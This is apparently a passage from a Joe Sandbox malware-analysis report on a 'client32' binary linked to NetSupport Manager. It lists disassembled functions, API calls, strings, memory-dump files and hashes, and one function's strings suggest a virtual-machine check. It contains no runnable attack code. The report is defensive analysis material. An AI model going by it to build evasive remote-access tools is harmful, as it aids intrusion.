                                                                                                                                        Function 688F74B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 119COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: DATA$FLAGS$FROM$LEN$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$nclen == datalen
                                                                                                                                        • API String ID: 269201875-852054525
                                                                                                                                        • Opcode ID: 3af49d428bd768503bedb98992708804344ffb17db642bb476d7aefa23de74ed
                                                                                                                                        • Instruction ID: 99721d62375979d268432da07027cff11c5e3df6c6fcb8ae4eed5ef8eb146ebf
                                                                                                                                        • Opcode Fuzzy Hash: 3af49d428bd768503bedb98992708804344ffb17db642bb476d7aefa23de74ed
                                                                                                                                        • Instruction Fuzzy Hash: 23419EB5D042196FEB00DFB89C40AFFBAF8AF59254F944539E815E7200F735DA058BA1
                                                                                                                                        Function 688F7EF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F7F26
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F7FF9
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F8047
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F8052
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F806A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 920729587-4141403093
                                                                                                                                        • Opcode ID: 71f0ab1245f9274ce214fc60d74e729846b3cd4dfaa316f706af7f0d5d7a7d31
                                                                                                                                        • Instruction ID: c8c759e68e9259d6f41274bd23c974d24be7d01f28294c9afed9b1e79eb27065
                                                                                                                                        • Opcode Fuzzy Hash: 71f0ab1245f9274ce214fc60d74e729846b3cd4dfaa316f706af7f0d5d7a7d31
                                                                                                                                        • Instruction Fuzzy Hash: B441A1B4C0821DAFEF20DFA4CC41BAE76F4EF05354F804469E859E6240EB359A44CBA6
                                                                                                                                        Function 688F1000 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 688F102B
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
                                                                                                                                        • API String ID: 501242067-340907830
                                                                                                                                        • Opcode ID: 19da099358468845a75f1518a70dbd8902dda9f4a4026e10864cfca3bcbb703a
                                                                                                                                        • Instruction ID: d1fa53857925d84f5c352efdf6f231468c474b0a258857c9288551486e8a1167
                                                                                                                                        • Opcode Fuzzy Hash: 19da099358468845a75f1518a70dbd8902dda9f4a4026e10864cfca3bcbb703a
                                                                                                                                        • Instruction Fuzzy Hash: A7318DBB9452A89BC701CE6E8801689FBF5AFD1214F5D41B6EC94DB301E235EA07C790
                                                                                                                                        Function 1108B130 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 101timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089F9C
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FB6
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FC6
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FD7
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FE9
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FFB
                                                                                                                                        • timeGetTime.WINMM ref: 1108B14F
                                                                                                                                        • timeGetTime.WINMM ref: 1108B17D
                                                                                                                                        • timeGetTime.WINMM ref: 1108B1BF
                                                                                                                                        • timeGetTime.WINMM ref: 1108B202
                                                                                                                                        Strings
                                                                                                                                        • BuildDynamicPalette(%d*%d), took %d ms, xrefs: 1108B1CF
                                                                                                                                        • SampleData(%d*%d,%d), took %d ms, xrefs: 1108B18F
                                                                                                                                        • BuildLUT(p12to8), took %d ms, xrefs: 1108B20B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _calloc$Timetime
                                                                                                                                        • String ID: BuildDynamicPalette(%d*%d), took %d ms$BuildLUT(p12to8), took %d ms$SampleData(%d*%d,%d), took %d ms
                                                                                                                                        • API String ID: 323206698-2628575008
                                                                                                                                        • Opcode ID: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
                                                                                                                                        • Instruction ID: bb2eac5478b68b536a49f708560dc7754919b06093feb73e476f748ba0a9216f
                                                                                                                                        • Opcode Fuzzy Hash: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
                                                                                                                                        • Instruction Fuzzy Hash: 36314FB9D04119AFDB10EFA8DC84AEFBBB8EB88718F104195FD0597241D634AE50CBE1
                                                                                                                                        Function 688F7C60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F7C8D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D18
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D68
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D6F
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 920729587-4141403093
                                                                                                                                        • Opcode ID: 79bd8e66c66f3631e31a90c6ebbeaaedd53012fbb20f68ea9353d012367de6d0
                                                                                                                                        • Instruction ID: 6ab1c54e4ffed116a32ed73f60dab42c010ac9391cf06650a607345e6f36f13a
                                                                                                                                        • Opcode Fuzzy Hash: 79bd8e66c66f3631e31a90c6ebbeaaedd53012fbb20f68ea9353d012367de6d0
                                                                                                                                        • Instruction Fuzzy Hash: 9831A6B1D04219AFEF20DFA4CC40BEEBBF5EB49314F404469E559E7240EB359A41CBA1
                                                                                                                                        Function 6890BB40 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                                                        • API String ID: 4104443479-3492528137
                                                                                                                                        • Opcode ID: 1dcabf571e59b02b0458c7679f73ecaf2bd27c863f1e304f7fa93b3f9b630733
                                                                                                                                        • Instruction ID: 4bbf20ca4610ce92e2e87dc623f8c1c81cc4dad5b4564e72d1b7ff9197b39cab
                                                                                                                                        • Opcode Fuzzy Hash: 1dcabf571e59b02b0458c7679f73ecaf2bd27c863f1e304f7fa93b3f9b630733
                                                                                                                                        • Instruction Fuzzy Hash: 2A21F1396402216FD724DF9CEC92D2E33648FD824CB90443CE64D6B249DB32ED0542E2
                                                                                                                                        Function 6890BD90 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                                                        • API String ID: 4104443479-3876480746
                                                                                                                                        • Opcode ID: 76726db0c4b650cec4607822251ba58070a82bd41446a9861d85dcd402942372
                                                                                                                                        • Instruction ID: a9c4fb7776df5482832fdbad2e825566ca6aa7a2f86c6a3c6b5e1e6c8af01e2f
                                                                                                                                        • Opcode Fuzzy Hash: 76726db0c4b650cec4607822251ba58070a82bd41446a9861d85dcd402942372
                                                                                                                                        • Instruction Fuzzy Hash: 2D21F57A640225AFD704DB9C9C95CBEB368EF94358BC44129FE5C6B205EB30ED0541E1
                                                                                                                                        Function 68907D50 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _sprintf
                                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
                                                                                                                                        • API String ID: 1467051239-555777999
                                                                                                                                        • Opcode ID: 61b8b888ae01c7f0b32c010d6f4b6bb3397c70a2704f6edac5e4215f632aff28
                                                                                                                                        • Instruction ID: 58312b9145586ee43070cc7566ac22c1b4d77a466a96ba0d129608e503cf38d8
                                                                                                                                        • Opcode Fuzzy Hash: 61b8b888ae01c7f0b32c010d6f4b6bb3397c70a2704f6edac5e4215f632aff28
                                                                                                                                        • Instruction Fuzzy Hash: 5E21D67590822C7FCB10D7B49C20AFA77F85B9A20AF80459CE9D992140EA35E6088BA0
                                                                                                                                        Function 6890DA30 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6890DA47
                                                                                                                                        • CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 6890DA6A
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 6890DA97
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?), ref: 6890DAA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                        • String ID: 0/#v$Refcount.cpp$hThread
                                                                                                                                        • API String ID: 3360349984-878792544
                                                                                                                                        • Opcode ID: d1c73c6dd1b4e9f971e55d9e17fa5459025f91d5d7a129c773ef0e862d8fc37f
                                                                                                                                        • Instruction ID: 25bfdbffeb4fdcc5d99e0a27a48e8cf550afac68ef5c5763bc90921a369d1231
                                                                                                                                        • Opcode Fuzzy Hash: d1c73c6dd1b4e9f971e55d9e17fa5459025f91d5d7a129c773ef0e862d8fc37f
                                                                                                                                        • Instruction Fuzzy Hash: A0015E76348301BFE7308E99CC49F1B7BACEB85725F504228FA1996280D6B0E8058BA0
                                                                                                                                        Function 68910BB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 68910BB8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68910BCB
                                                                                                                                        • _malloc.LIBCMT ref: 68910BF3
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _free.LIBCMT ref: 68910BEB
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 68910C10
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                        • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                                                        • API String ID: 1157017740-2359281783
                                                                                                                                        • Opcode ID: c7ffc6d33af0e9aef0c03635c6f2e7d682a853a3b7e5ed69a4f91ef53538e23a
                                                                                                                                        • Instruction ID: b9c4419db9b9b36ebb8f30d536c7ccd70271553687dea71dedc5789f6f5a9d08
                                                                                                                                        • Opcode Fuzzy Hash: c7ffc6d33af0e9aef0c03635c6f2e7d682a853a3b7e5ed69a4f91ef53538e23a
                                                                                                                                        • Instruction Fuzzy Hash: FFF0A4BA64C316ABD7309B749C84D1F77ECAFA5608740482CE5ABC7500EA36E450CB20
                                                                                                                                        Function 110ED140 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3489003387-0
                                                                                                                                        • Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                        • Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
                                                                                                                                        • Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                        • Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2
                                                                                                                                        Function 1101F140 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 1101F1B1
                                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
